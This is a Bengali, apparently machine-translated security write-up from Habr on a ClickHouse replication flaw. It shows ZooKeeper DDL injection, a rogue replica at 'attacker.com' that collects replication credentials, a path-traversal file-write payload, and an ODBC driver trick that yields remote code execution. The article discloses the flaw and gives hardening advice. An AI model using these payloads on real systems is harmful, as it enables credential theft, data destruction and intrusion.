চিড়িয়াখানার খাঁচা বন্ধ রাখতে হবে কেন?

এই নিবন্ধটি ClickHouse রেপ্লিকেশন প্রোটোকলের একটি খুব নির্দিষ্ট দুর্বলতার গল্প বলবে, এবং এটিও দেখাবে কিভাবে আক্রমণের পৃষ্ঠকে প্রসারিত করা যায়।

ClickHouse হল একটি ডাটাবেস যা প্রচুর পরিমাণে ডেটা সঞ্চয় করে, প্রায়শই একাধিক প্রতিরূপ ব্যবহার করে। ক্লিকহাউসে ক্লাস্টারিং এবং প্রতিলিপি উপরে তৈরি করা হয়েছে Apache ZooKeeper (ZK) এবং লেখার অধিকার প্রয়োজন।

ডিফল্ট ZK ইনস্টলেশনের জন্য প্রমাণীকরণের প্রয়োজন হয় না, তাই কাফকা, হাদুপ, ক্লিকহাউস কনফিগার করতে ব্যবহৃত হাজার হাজার ZK সার্ভার সর্বজনীনভাবে উপলব্ধ।

আপনার আক্রমণের পৃষ্ঠকে কমাতে, ZooKeeper ইনস্টল করার সময় আপনার সর্বদা প্রমাণীকরণ এবং অনুমোদন কনফিগার করা উচিত

অবশ্যই কিছু 0দিন ভিত্তিক জাভা ডিসিরিয়ালাইজেশন আছে, কিন্তু কল্পনা করুন যে একজন আক্রমণকারী ZooKeeper-এ পড়তে এবং লিখতে পারে, ক্লিকহাউসের প্রতিলিপির জন্য ব্যবহৃত হয়।

ক্লাস্টার মোডে কনফিগার করা হলে, ক্লিক হাউস বিতরণ করা প্রশ্নগুলিকে সমর্থন করে DDL, ZK এর মধ্য দিয়ে যাওয়া - তাদের জন্য শীটে নোড তৈরি করা হয় /clickhouse/task_queue/ddl.

উদাহরণস্বরূপ, আপনি একটি নোড তৈরি করুন /clickhouse/task_queue/ddl/query-0001 বিষয়বস্তু সহ:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

এবং এর পরে, ক্লাস্টার সার্ভার host1 এবং host2 থেকে পরীক্ষার টেবিলটি মুছে ফেলা হবে। DDL ক্রিয়েট/আল্টার/ড্রপ কোয়েরি চালানো সমর্থন করে।

ভীতিকর শব্দ? কিন্তু একজন আক্রমণকারী সার্ভারের ঠিকানা কোথায় পেতে পারে?

ক্লিক হাউস প্রতিলিপি পৃথক টেবিলের স্তরে কাজ করে, যাতে ZK-তে একটি টেবিল তৈরি করা হলে, একটি সার্ভার নির্দিষ্ট করা হয় যা প্রতিলিপিগুলির সাথে মেটাডেটা বিনিময়ের জন্য দায়ী হবে৷ উদাহরণস্বরূপ, একটি অনুরোধ কার্যকর করার সময় (ZK কনফিগার করা আবশ্যক, chXX - প্রতিরূপের নাম, foobar - টেবিলের নাম):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

নোড তৈরি করা হবে কলাম и মেটাডাটা.

সামগ্রী /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

এই ক্লাস্টার থেকে ডেটা মার্জ করা কি সম্ভব? হ্যাঁ, যদি প্রতিলিপি পোর্ট (TCP/9009) সার্ভারে chXX-address ফায়ারওয়াল বন্ধ করা হবে না এবং প্রতিলিপির জন্য প্রমাণীকরণ কনফিগার করা হবে না। প্রমাণীকরণ বাইপাস কিভাবে?

একজন আক্রমণকারী শুধুমাত্র বিষয়বস্তু অনুলিপি করে ZK-এ একটি নতুন প্রতিরূপ তৈরি করতে পারে /clickhouse/tables/01-01/foobar/replicas/chXX এবং অর্থ পরিবর্তন host.

সামগ্রী /clickhouse/tables/01–01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

তারপরে আপনাকে অন্যান্য প্রতিলিপিগুলিকে বলতে হবে যে আক্রমণকারীর সার্ভারে ডেটার একটি নতুন ব্লক রয়েছে যা তাদের নিতে হবে - ZK এ একটি নোড তৈরি করা হয়েছে /clickhouse/tables/01-01/foobar/log/log-00000000XX (XX একঘেয়ে ক্রমবর্ধমান কাউন্টার, যা ইভেন্ট লগের শেষের চেয়ে বড় হওয়া উচিত):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

যেখানে উৎস_প্রতিলিপি - আগের ধাপে তৈরি করা আক্রমণকারীর প্রতিরূপের নাম, ব্লক_আইডি - ডেটা ব্লক শনাক্তকারী, পাওয়া - "ব্লক পান" কমান্ড (এবং এখানে অন্যান্য অপারেশন জন্য কমান্ড আছে).

এর পরে, প্রতিটি প্রতিলিপি লগে একটি নতুন ইভেন্ট পড়ে এবং আক্রমণকারীর দ্বারা নিয়ন্ত্রিত একটি সার্ভারে গিয়ে ডেটার একটি ব্লক গ্রহণ করে (প্রতিলিপি প্রোটোকলটি বাইনারি, HTTP-এর উপরে চলছে)। সার্ভার attacker.com অনুরোধ পাবেন:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

যেখানে XXX হল প্রতিলিপির জন্য প্রমাণীকরণ ডেটা। কিছু ক্ষেত্রে, এটি প্রধান ClickHouse প্রোটোকল এবং HTTP প্রোটোকলের মাধ্যমে ডাটাবেসে অ্যাক্সেস সহ একটি অ্যাকাউন্ট হতে পারে। আপনি যেমন দেখেছেন, আক্রমণের পৃষ্ঠটি সমালোচনামূলকভাবে বড় হয়ে উঠেছে কারণ প্রতিলিপির জন্য ব্যবহৃত ZooKeeper, প্রমাণীকরণ কনফিগার করা ছাড়াই রেখে দেওয়া হয়েছিল।

আসুন একটি প্রতিলিপি থেকে ডেটার ব্লক পাওয়ার ফাংশনটি দেখি, এটি সম্পূর্ণ আত্মবিশ্বাসের সাথে লেখা হয়েছে যে সমস্ত প্রতিলিপি যথাযথ নিয়ন্ত্রণে রয়েছে এবং তাদের মধ্যে বিশ্বাস রয়েছে।

প্রতিলিপি প্রক্রিয়াকরণ কোড

ফাংশনটি ফাইলগুলির একটি তালিকা পড়ে, তারপরে তাদের নাম, আকার, বিষয়বস্তু, এবং তারপর ফাইল সিস্টেমে সেগুলি লিখে। ফাইল সিস্টেমে ডেটা কীভাবে সংরক্ষণ করা হয় তা আলাদাভাবে বর্ণনা করা মূল্যবান।

এর মধ্যে বেশ কয়েকটি সাবডিরেক্টরি রয়েছে /var/lib/clickhouse (কনফিগারেশন ফাইল থেকে ডিফল্ট স্টোরেজ ডিরেক্টরি):

পতাকা - রেকর্ডিংয়ের জন্য ডিরেক্টরি পতাকা, ডেটা হারানোর পরে পুনরুদ্ধারের জন্য ব্যবহৃত হয়;
tmp, - অস্থায়ী ফাইল সংরক্ষণের জন্য ডিরেক্টরি;
ব্যবহারকারী ফাইল — অনুরোধের ফাইলগুলির সাথে অপারেশনগুলি এই ডিরেক্টরিতে সীমাবদ্ধ (INTO OUTFILE এবং অন্যান্য);
মেটাডাটা — টেবিল বর্ণনা সহ sql ফাইল;
preprocessed_configs - থেকে প্রসেসড ডেরিভেটিভ কনফিগারেশন ফাইল /etc/clickhouse-server;
উপাত্ত - ডেটার সাথে প্রকৃত ডিরেক্টরি, এই ক্ষেত্রে প্রতিটি ডাটাবেসের জন্য একটি পৃথক সাবডিরেক্টরি এখানে তৈরি করা হয়েছে (উদাহরণস্বরূপ /var/lib/clickhouse/data/default).

প্রতিটি টেবিলের জন্য, ডাটাবেস ডিরেক্টরিতে একটি সাবডিরেক্টরি তৈরি করা হয়। প্রতিটি কলামের উপর নির্ভর করে একটি পৃথক ফাইল ইঞ্জিন বিন্যাস. উদাহরণস্বরূপ একটি টেবিলের জন্য foobarএকটি আক্রমণকারী দ্বারা তৈরি, নিম্নলিখিত ফাইল তৈরি করা হবে:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

প্রতিরূপটি ডেটা ব্লক প্রক্রিয়াকরণের সময় একই নামের ফাইলগুলি পাওয়ার আশা করে এবং সেগুলিকে কোনোভাবেই যাচাই করে না।

মনোযোগী পাঠক সম্ভবত ইতিমধ্যেই একটি ফাংশনে file_name এর অনিরাপদ সংযোজন সম্পর্কে শুনেছেন WriteBufferFromFile. হ্যাঁ, এটি একজন আক্রমণকারীকে ব্যবহারকারীর অধিকার সহ FS-এ যেকোনো ফাইলে নির্বিচারে বিষয়বস্তু লিখতে দেয় clickhouse. এটি করার জন্য, আক্রমণকারীর দ্বারা নিয়ন্ত্রিত প্রতিলিপিকে অবশ্যই অনুরোধের নিম্নলিখিত প্রতিক্রিয়াটি ফেরত দিতে হবে (বোঝার সুবিধার জন্য লাইন বিরতি যোগ করা হয়েছে):

x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper

এবং সংযুক্তির পরে ../../../../../../../../../tmp/pwned ফাইল লেখা হবে /tmp/pwned বিষয়বস্তু সহ হ্যালোফ্রাম চিড়িয়াখানার রক্ষক.

ফাইল লেখার ক্ষমতাকে রিমোট কোড এক্সিকিউশন (RCE) এ পরিণত করার জন্য বেশ কয়েকটি বিকল্প রয়েছে।

RCE মধ্যে বহিরাগত অভিধান

পুরানো সংস্করণগুলিতে, ক্লিকহাউস সেটিংস সহ ডিরেক্টরিটি ব্যবহারকারীর অধিকার সহ সংরক্ষণ করা হয়েছিল ক্লিক হাউস ডিফল্ট. সেটিংস ফাইলগুলি হল XML ফাইল যা পরিষেবাটি স্টার্টআপে পড়ে এবং তারপরে ক্যাশে করে৷ /var/lib/clickhouse/preprocessed_configs. পরিবর্তন ঘটলে, সেগুলি পুনরায় পড়া হয়। আপনার যদি অ্যাক্সেস থাকে /etc/clickhouse-server একজন আক্রমণকারী তার নিজের তৈরি করতে পারে বাহ্যিক অভিধান এক্সিকিউটেবল টাইপ এবং তারপর নির্বিচারে কোড চালান। ক্লিকহাউসের বর্তমান সংস্করণগুলি ডিফল্টরূপে অধিকার প্রদান করে না, তবে সার্ভারটি ধীরে ধীরে আপডেট করা হলে, এই ধরনের অধিকারগুলি থেকে যেতে পারে। আপনি যদি একটি ClickHouse ক্লাস্টার সমর্থন করেন, সেটিংস ডিরেক্টরির অধিকার পরীক্ষা করুন, এটি অবশ্যই ব্যবহারকারীর অন্তর্গত root.

ODBC থেকে RCE

একটি প্যাকেজ ইনস্টল করার সময়, একটি ব্যবহারকারী তৈরি করা হয় clickhouse, কিন্তু এর হোম ডিরেক্টরি তৈরি করা হয় না /nonexistent. যাইহোক, বহিরাগত অভিধান ব্যবহার করার সময়, বা অন্যান্য কারণে, প্রশাসকরা একটি ডিরেক্টরি তৈরি করে /nonexistent এবং ব্যবহারকারীকে দিন clickhouse এটিতে লিখতে অ্যাক্সেস (SSZB! প্রায়. অনুবাদক).

ক্লিক হাউস সমর্থন করে ODBC এবং অন্যান্য ডাটাবেসের সাথে সংযোগ করতে পারে। ODBC-তে, আপনি ডাটাবেস ড্রাইভার লাইব্রেরির (.so) পথ নির্দিষ্ট করতে পারেন। ClickHouse-এর পুরানো সংস্করণগুলি আপনাকে অনুরোধ হ্যান্ডলারে সরাসরি এটি করার অনুমতি দিয়েছে, কিন্তু এখন সংযোগ স্ট্রিংয়ের আরও কঠোর চেক যোগ করা হয়েছে odbc-bridge, তাই অনুরোধ থেকে ড্রাইভার পাথ নির্দিষ্ট করা আর সম্ভব নয়। কিন্তু একজন আক্রমণকারী কি উপরে বর্ণিত দুর্বলতা ব্যবহার করে হোম ডিরেক্টরিতে লিখতে পারে?

এর একটি ফাইল তৈরি করা যাক ~/.odbc.ini এই মত বিষয়বস্তু সহ:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

তারপর স্টার্টআপে SELECT * FROM odbc('DSN=lalala', 'test', 'test'); লাইব্রেরি লোড করা হবে test.so এবং RCE পেয়েছে (ধন্যবাদ বাগলোক টিপের জন্য)।

ক্লিকহাউস সংস্করণ 19.14.3-এ এইগুলি এবং অন্যান্য দুর্বলতাগুলি সংশোধন করা হয়েছে৷ আপনার ClickHouse এবং ZooKeepers যত্ন নিন!

উত্স: www.habr.com